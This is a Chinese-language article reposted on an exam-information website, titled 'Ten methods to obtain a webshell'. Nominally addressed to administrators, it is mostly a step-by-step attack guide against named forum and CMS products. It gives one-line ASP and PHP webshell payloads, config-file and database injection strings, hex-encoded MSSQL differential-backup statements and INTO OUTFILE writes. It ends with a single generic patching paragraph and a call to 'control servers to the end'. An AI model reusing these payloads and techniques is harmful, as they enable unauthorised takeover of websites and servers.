十種獲取webshell的方法
來源:易賢網(wǎng) 閱讀:2419 次 日期:2016-08-03 15:16:18
溫馨提示:易賢網(wǎng)小編為您整理了“十種獲取webshell的方法”,方便廣大網(wǎng)友查閱!

黑客在入侵企業(yè)網(wǎng)站時(shí),通常要通過各種方式獲取webshell從而獲得企業(yè)網(wǎng)站的控制權(quán),然后方便進(jìn)行之后的入侵行為。本篇文章將如何獲取webshell總結(jié)成為了十種方法,希望廣大的企業(yè)網(wǎng)絡(luò)管理員能夠通過了解獲取webshell的途徑,對(duì)企業(yè)自身進(jìn)行防范。

一、直接上傳獲取webshell

這種對(duì)php和jsp的一些程序比較常見,MolyX BOARD就是其中一例,直接在心情圖標(biāo)管理上傳。php類型,雖然沒有提示,其實(shí)已經(jīng)成功了,上傳的文 件url應(yīng)該是http://forums/images/smiles/下,前一陣子的聯(lián)眾游戲站和網(wǎng)易的jsp系統(tǒng)漏洞就可以直接上傳jsp文件。文件名是原來的文件名,bo-blog后臺(tái)可以可以直接上傳。php文件,上傳的文件路徑有提示。以及一年前十分流行的upfile.asp漏洞(動(dòng)網(wǎng)5.0和6.0、早期的許多整站系統(tǒng)),因過濾上傳文件不嚴(yán),導(dǎo)致用戶可以直接上傳webshell到網(wǎng)站任意可寫目錄中,從而拿到網(wǎng)站的管理員控制權(quán)限。

二、添加修改上傳類型

現(xiàn)在很多的腳本程序上傳模塊不是只允許上傳合法文件類型,而大多數(shù)的系統(tǒng)是允許添加上傳類型,bbsxp后臺(tái)可以添加asa|asP類型,ewebeditor的后臺(tái)也可添加asa類型,通過修改后我們可以直接上傳asa后綴的webshell了,還有一種情況是過濾了。asp,可以添加。aspasp的文件類型來上傳獲得webshell.php系統(tǒng)的后臺(tái),我們可以添加。php.g1f的上傳類型,這是php的一個(gè)特性,最后的哪個(gè)只要不是已知的文件類型即可,php會(huì)將php.g1f作為。php來正常運(yùn)行,從而也可成功拿到shell.LeadBbs3.14后臺(tái)獲得webshell方法是:在上傳類型中增加asp ,注意,asp后面是有個(gè)空格的,然后在前臺(tái)上傳ASP馬,當(dāng)然也要在后面加個(gè)空格!

三、利用后臺(tái)管理功能寫入webshell

上傳漏洞基本上補(bǔ)的也差不多了,所以我們進(jìn)入后臺(tái)后還可以通過修改相關(guān)文件來寫入webshell.比較的典型的有dvbbs6.0,還有l(wèi)eadbbs2.88等,直接在后臺(tái)修改配置文件,寫入后綴是asp的文件。而LeadBbs3.14后臺(tái)獲得webshell另一方法是:添加一個(gè)新的友情鏈接,在網(wǎng)站名稱處寫上冰狐最小馬即可,最小馬前后要隨便輸入一些字符,http:\\網(wǎng)站\inc\IncHtm\BoardLink.asp就是我們想要的shell.

四、利用后臺(tái)管理向配置文件寫webshell

利用"""":""http://"等符號(hào)構(gòu)造最小馬寫入程序的配置文件,joekoe論壇,某某同學(xué)錄,沸騰展望新聞系統(tǒng),COCOON Counter統(tǒng)計(jì)程序等等,還有很多php程序都可以,COCOON Counter統(tǒng)計(jì)程序舉例,在管理郵箱處添上cnhacker@263.net":eval request(chr (35))//, 在配制文件中就是webmail="cnhacker@263.net\":eval request(chr(35))//",還有一種方法就是寫上 cnhacker@263.net"%><%eval request(chr(35))%><%',這樣就會(huì)形成前后對(duì)應(yīng),最小馬也就運(yùn)行了。<%eval request(chr(35))%>可以用lake2的eval發(fā)送端以及最新的2006 客戶端來連,需要說明的是數(shù)據(jù)庫(kù)插馬時(shí)候要選前者。再如動(dòng)易2005,到文章中心管理-頂部菜單設(shè)置-菜單其它特效,插入一句話?cǎi)R"%><%execute request("l")%><%',保 存頂部欄目菜單參數(shù)設(shè)置成功后,我們就得到馬地址http://網(wǎng)站/admin/rootclass_menu_config.asp.

五、利用后臺(tái)數(shù)據(jù)庫(kù)備份及恢復(fù)獲取webshell

主要是利用后臺(tái)對(duì)access數(shù)據(jù)庫(kù)的“備份數(shù)據(jù)庫(kù)”或“恢復(fù)數(shù)據(jù)庫(kù)”功能,“備份的數(shù)據(jù)庫(kù)路徑”等變量沒有過濾導(dǎo)致可以把任意文件后綴改 為asp,從而得到webshell,msssql版的程序就直接應(yīng)用了access版的代碼,導(dǎo)致sql版照樣可以利用。還可以備份網(wǎng)站asp文件為其他后綴 如。txt文件,從而可以查看并獲得網(wǎng)頁源代碼,并獲得更多的程序信息增加獲得webshell的機(jī)會(huì)。在實(shí)際運(yùn)用中經(jīng)常會(huì)碰到?jīng)]有上傳功能的時(shí) 候,但是有asp系統(tǒng)在運(yùn)行,利用此方法來查看源代碼來獲得其數(shù)據(jù)庫(kù)的位置,為數(shù)據(jù)庫(kù)插馬來創(chuàng)造機(jī)會(huì),動(dòng)網(wǎng)論壇就有一個(gè)ip地址的數(shù)據(jù)庫(kù),在后臺(tái)的ip管理中可以插入最小馬然后備份成。asp文件即可。在談?wù)勍黄粕蟼鳈z測(cè)的方法,很多asp程序在即使改了后綴名后也會(huì)提示文件非法,通過在。asp文件頭加上gif89a修改后綴為gif來騙過asp程序檢測(cè)達(dá)到上傳的目的,還有一種就是用記事本打開圖片文件,隨便粘貼一部分復(fù)制到asp木馬文件頭,修改gif后綴后上傳也可以突破檢測(cè),然后備份為。asp文件,成功得到webshell.

六、利用數(shù)據(jù)庫(kù)壓縮功能

可以將數(shù)據(jù)的防下載失效從而使插入數(shù)據(jù)庫(kù)的最小馬成功運(yùn)行,比較典型的就是loveyuki的L-BLOG,在友情添加的url出寫上<%eval request (chr(35))%>, 提交后,在數(shù)據(jù)庫(kù)操作中壓縮數(shù)據(jù)庫(kù),可以成功壓縮出。asp文件,用海洋的最小馬的eval客戶端連就得到一個(gè)webshell.

七、asp+mssql系統(tǒng)

這里需要提一點(diǎn)動(dòng)網(wǎng)mssql版,但是可以直接本地提交來備份的。首先在發(fā)帖那上傳一個(gè)寫有asp代碼的假圖片,然后記住其上傳路徑。寫一個(gè)本地提交的表單,代碼如下:<form action=http://網(wǎng)站/bbs/admin_data.asp?action=RestoreData&act=Restore method="post"> <p>已上傳文件的位置:<input name="Dbpath" type="text" size="80"></p> <p>要復(fù)制到的位置:<input name="backpath" type="text" size="80"></p> <p><input type="submit" value="提交"></p> </form>另存為。htm本地執(zhí)行。把假圖片上傳路徑填在“已上傳文件的位置”那里,想要備份的WebShell的相對(duì)路徑填寫在“要復(fù)制到的位置”那里,提交就得到我們可愛的WebShell了,恢復(fù)代碼和此類似,修改相關(guān)地方就可以了。沒有遇到過后臺(tái)執(zhí)行mssql命令比較強(qiáng)大的asp程序后臺(tái),動(dòng)網(wǎng)的數(shù)據(jù)庫(kù)還原和備份是個(gè)擺設(shè),不能執(zhí)行sql命令備份webshell,只能執(zhí)行一些簡(jiǎn)單的查詢命令。可以利用mssql注入差異備份webshell,一般后臺(tái)是顯示了絕對(duì)路徑,只要有了注入點(diǎn)基本上就可以差異備份成功。下面是差異備份的主要語句代碼,利用動(dòng)網(wǎng)7.0的注入漏洞可以用差異備份一個(gè)webshell,可以用利用上面提到的方法,將conn.asp文件備份成。txt文件而獲得庫(kù)名。

差異備份的主要代碼:

;declare @a sysname,@s varchar(4000) select @a=db_name(),@s=0x626273 backup database @a to disk=@s——

;Drop table [heige];create table [dbo].[heige] ([cmd] [image])——

;insert into heige(cmd) values(0x3C2565786563757465207265717565737428226C2229253E)——

;declare @a sysname,@s varchar(4000) select @a=db_name(),@s=0x643A5C7765625C312E617370 backup database @a to disk=@s WITH DIFFERENTIAL,F(xiàn)ORMAT——這段代碼中,0x626273是要備份的庫(kù)名bbs的十六進(jìn)制,可以是其他名字比如bbs.bak; 0x3C2565786563757465207265717565737428226C2229253E是<%execute request("l")%>的十六進(jìn)制,是lp最小馬;0x643A5C7765625C312E617370是d:\web\1.asp的十六進(jìn)制,也就是你要備份的webshell路徑。當(dāng)然也可以用比較常見備份方式來獲得webshell,唯一的不足就是備份后的文件過大,如果備份數(shù)據(jù)庫(kù)中有防下載的的數(shù)據(jù)表,或者有錯(cuò)誤的asp代碼,備份出來的webshell就不會(huì)成功運(yùn)行,利用差異備份是成功率比較高的方法,并且極大的減少備份文件的大小。

八、php+mysql系統(tǒng)

后臺(tái)需要有mysql數(shù)據(jù)查詢功能,我們就可以利用它執(zhí)行SELECT …… INTO OUTFILE查詢輸出php文件,因?yàn)樗械臄?shù)據(jù)是存放在mysql里的,所以我們可以通過正常手段把我們的webshell代碼插入mysql在利用SELECT …… INTO OUTFILE語句導(dǎo)出shell.在mysql操作里輸入select 0x3C3F6576616C28245F504F53545B615D293B3F3E from mysql.user into outfile '路徑‘ 就可以獲得了一個(gè)<?eval($_POST[a]);?>的最小馬' 0x3C3F6576616C28245F504F53545B615D293B3F3E 是我們<?eval($_POST[a]);?>的十六進(jìn)制,這種方法對(duì)phpmyadmin比較普遍,先利用phpmyadmin的路徑泄露漏洞,就可以暴出路徑,php環(huán)境中比較容易暴出絕對(duì)路徑:)。提一點(diǎn)的是遇到是mysql在win系統(tǒng)下路徑應(yīng)該這樣寫d:\\wwwroot\\a.php.下面的方法是比較常用的一個(gè)導(dǎo)出webshell的方法,也可以寫個(gè)vbs添加系統(tǒng)管理員的腳本導(dǎo)出到啟動(dòng)文件夾,系統(tǒng)重起后就會(huì)添加一個(gè)管理員帳號(hào)CREATE TABLE a(cmd text NOT NULL)

INSERT INTO a(cmd) VALUES('<?fputs(fopen("./a.php","w"),"<?eval(\$_POST[a]);?>")?>')

select cmd from a into outfile '路徑/b.php' DROP TABLE IF EXISTS a訪問b.php就會(huì)生成一個(gè)<?eval($_POST[a]);?>的最小馬。

如果遇到可以執(zhí)行php命令就簡(jiǎn)單多了,典型的代表是BO-BLOG,在后臺(tái)的php命令框輸入以下代碼:

<?$sa = fopen("./up/saiy.php","w");fwrite($sa,"<?eval(\$_POST[a]);?".">");fclose($sa);?>

就會(huì)在up目錄下生成文件名為saiy.php內(nèi)容為<?eval($_POST[a]);?>的最小php木馬,最后用lanker的客戶端來連接。實(shí)際運(yùn)用中要考慮到文件夾是否有寫權(quán)限。或者輸入這樣的代碼<?fputs(fopen("./a.php","w"),"<?eval(\$_POST[a]);?>")?> 將會(huì)在當(dāng)前目錄生成一個(gè)a.php的最小馬。

九、phpwind論壇從后臺(tái)到webshell的三種方式

方式1 模板法進(jìn)入后臺(tái), 風(fēng)格模版設(shè)置 ,在隨便一行寫代碼,記住,這代碼必須頂著左邊行寫,代碼前面不可以有任何字符。

EOT;eval($a);print <<<EOT而后得到一個(gè)shell為http://網(wǎng)站/bbs/index.php.

方式2 臟話過濾法進(jìn)入安全管理 ◇ 不良詞語過濾。新增不良詞語寫 a‘]=’aa‘;eval($_POST[’a‘]);//

替換為那里可以隨意寫,而后得到一個(gè)shell地址為http://網(wǎng)站/bbs/data/bbscache/wordsfb.php.

方式3 用戶等級(jí)管理新建立會(huì)員組,頭銜你可以隨便寫,但是千萬不要寫單雙引號(hào)特殊符號(hào),升級(jí)圖片號(hào)寫a‘;eval($_POST[’a‘]);// ,升級(jí)點(diǎn)數(shù)依然可以隨意寫。而后得到一個(gè)shell地址為http://網(wǎng)站/bbs/data/bbscache/level.php.以上三種方式得到webshellr的密碼是a,為lanker的一句話后門服務(wù)端。

十、利用網(wǎng)站訪問計(jì)數(shù)系統(tǒng)記錄來獲取webshell

最明顯的就是某私服程序內(nèi)的阿江計(jì)數(shù)程序,可以通過http://網(wǎng)站/stat.asp?style=text&referer= 代碼內(nèi)容&screenwidth=1024直接提交, 即可把代碼內(nèi)容直接插入到計(jì)數(shù)系統(tǒng)的數(shù)據(jù)庫(kù)中,而此系統(tǒng)默認(rèn)數(shù)據(jù)庫(kù)為count#.asa,我們可以通過http://網(wǎng)站/count%23.asa訪問得到webshell,由于阿江計(jì)數(shù)程序過濾了%和+,將最小馬改成<SCRIPT RUNAT=SERVER LANGUAGE=vbSCRIPT>eval(Request("1"))</SCRIPT>替換代碼內(nèi)容處提交,然后用lake2的eval客戶端來提交,值得一提的是如果進(jìn)到計(jì)數(shù)后臺(tái),可以清理某時(shí)某刻的數(shù)據(jù),一旦插入asp木馬失敗,可以清理數(shù)據(jù)庫(kù)再次操作。

解決方案由于本文涉及的代碼版本很多,所以不可能提供一個(gè)完美的解決方案。有能力者可以針對(duì)本文提到的漏洞文件進(jìn)行適當(dāng)修補(bǔ),若漏洞文件不影響系統(tǒng)使用也可刪除此文件。大家如果不會(huì)修補(bǔ),可以到相關(guān)官方網(wǎng)站下載最新補(bǔ)丁進(jìn)行修復(fù)更新。同時(shí)也請(qǐng)大家能時(shí)刻關(guān)注各大安全網(wǎng)絡(luò)發(fā)布的最新公告,若自己發(fā)現(xiàn)相關(guān)漏洞也可及時(shí)通知官方網(wǎng)站。

從后臺(tái)得到webshell的技巧應(yīng)該還有很多的,關(guān)鍵是要看大家怎么靈活運(yùn)用、觸類旁通,希望本文的方法能起到拋磚引玉的作用。 各位加油吧,讓我們將服務(wù)器控制到底!

更多信息請(qǐng)查看技術(shù)文章
易賢網(wǎng)手機(jī)網(wǎng)站地址:十種獲取webshell的方法
由于各方面情況的不斷調(diào)整與變化,易賢網(wǎng)提供的所有考試信息和咨詢回復(fù)僅供參考,敬請(qǐng)考生以權(quán)威部門公布的正式信息和咨詢?yōu)闇?zhǔn)!

2025國(guó)考·省考課程試聽報(bào)名

  • 報(bào)班類型
  • 姓名
  • 手機(jī)號(hào)
  • 驗(yàn)證碼
關(guān)于我們 | 聯(lián)系我們 | 人才招聘 | 網(wǎng)站聲明 | 網(wǎng)站幫助 | 非正式的簡(jiǎn)要咨詢 | 簡(jiǎn)要咨詢須知 | 加入群交流 | 手機(jī)站點(diǎn) | 投訴建議
工業(yè)和信息化部備案號(hào):滇ICP備2023014141號(hào)-1 云南省教育廳備案號(hào):云教ICP備0901021 滇公網(wǎng)安備53010202001879號(hào) 人力資源服務(wù)許可證:(云)人服證字(2023)第0102001523號(hào)
云南網(wǎng)警備案專用圖標(biāo)
聯(lián)系電話:0871-65099533/13759567129 獲取招聘考試信息及咨詢關(guān)注公眾號(hào):hfpxwx
咨詢QQ:526150442(9:00—18:00)版權(quán)所有:易賢網(wǎng)
云南網(wǎng)警報(bào)警專用圖標(biāo)